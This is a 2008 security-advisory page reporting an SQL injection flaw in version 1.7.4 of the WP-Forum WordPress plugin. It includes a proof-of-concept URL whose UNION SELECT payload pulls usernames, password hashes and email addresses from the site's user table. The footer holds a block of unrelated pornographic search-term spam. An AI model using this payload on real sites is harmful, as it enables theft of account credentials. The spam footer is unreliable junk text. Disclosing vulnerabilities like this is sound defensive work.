about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , WordPress Plugin WP-Forum SQL Injection Vulnerability


Title WordPress Plugin WP-Forum SQL Injection Vulnerability
Published 2008-01-19-12:00AM
Updated 2008-02-20-04:05PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  websec Team discovered this vulnerability.
Vulnerable  WPForum WPForum 1.7.4
Not Vulnerable  
Code  An attacker can exploit this issue via a browser.The following proof-of-concept URI is available:http://www.example.com/?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 20:00:37 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www.tamila news for C sexpicher Re www sexhot sHK lo188l angle69.co wwwwwsex bhabhi ki all+cartoo Sexymalik tube club 200 /compo t349t vedeosex+f Sahila sex Hilary Duf Sex Sakkil 200 /compo sexyrambha t349t G DATA U p Pusypics show sex sex girls www.freeon RPC DOM2 piksex Film.sex.a mediagalle mediagalle Laides sex nanse Googlesexi sexy nude HP System piksex Sexygils.c Sex in cha Vegina.Com ww89.comnu Film.sex.a sxs arabe Sex in cha Dog fuckin vedious ...B 2.0. Vidioe pla